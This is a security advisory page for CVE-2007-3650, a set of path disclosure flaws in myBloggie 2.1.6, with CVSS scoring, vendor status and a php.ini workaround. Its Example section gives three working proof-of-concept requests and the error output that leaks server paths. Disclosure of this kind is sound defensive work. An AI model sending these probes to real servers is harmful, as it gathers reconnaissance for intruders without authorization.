netVigilance Security Advisory CVE-2007-3650

CVE Logo

	Best Security Research
»	netVigilance is an active contributor to nvd.nist.gov
»	Every vulnerability in our database is independently scored according to CVSS 2.0
»	Our Scoring is compared to nvd.nist.gov and inconsistencies are reported to the NVD team at NIST
»	netVigilance is responsible for more than 400 changes to the National Vulnerability Database - more than anyone else.
»	Our Professional Services team will validate any vulnerability Scoring for you.

netVigilance Security Advisory

myBloggie version 2.1.6 Multiple Path

Disclosure Vulnerabilities

Home » Security Advisory 39 - CVE-2007-3650

Fact: More than 15 vulnerabilities were discovered EVERY day of 2009

Description:

myBloggie is considered one of the most simple, user-friendliest yet packed with features Weblog system available to date. Built using PHP & mySQL, web most popular scripting language & database system enable myBloggie to be installed in any webservers.

Security problems in the product allow attackers to gather the true path of the server-side script.

External References:
Mitre CVE: CVE-2007-3650
NVD NIST: CVE-2007-3650

Summary:
myBloggie is weblog system built using PHP & mySQL, web's most popular scripting language & database system which enable myBloggie to be installed in any web server.

Release Date:
June 30 2008

Severity:
Risk: Medium

Access Vector: Network
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS Base Score: 5.0

Target Distribution on Internet: Low

Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated

SecureScout Testcase ID:
TC 17970

Vulnerable Systems:
myBloggie version 2.1.6

Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings or even Fatal Errors.

Vendor:
myWebland

Vendor Status:
The Vendor has been notified April 9th 2007, but did not respond.

Workaround:
Disable warning messages: modify in the php.ini file following line:
display_errors = Off.

Example:

Path Disclosure Vulnerability 1: REQUEST: (PHP <5.0.0 and Windows Hosting are required) http://[TARGET]/[PRODUCT DIRECTORY]/index.php?month_no=2&year=10000 REPLY: ... Warning: mktime(): Windows does not support negative values for this function in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 28 Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 28 ... Warning: mktime(): Windows does not support negative values for this function in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 44 Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 44 ... Path Disclosure Vulnerability 2: REQUEST: http://[TARGET]/[PRODUCT DIRECTORY]/common.php REPLY: ... Warning: preg_replace(): Empty regular expression in [DISCLOSED PATH][PRODUCT DIRECTORY]\common.php on line 79 ... Path Disclosure Vulnerability 3: REQUEST: http://[TARGET]/[PRODUCT DIRECTORY]/login.php?mode[]=login REPLY: ... Warning: htmlspecialchars() expects parameter 1 to be string, array given in [DISCLOSED PATH][PRODUCT DIRECTORY]\login.php on line 39 ...

Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com

back to Security Advisories

PCI

Products

Partners

Literature

Compliance

News

Security and Support Centre

Archive

Compliance

Case Stories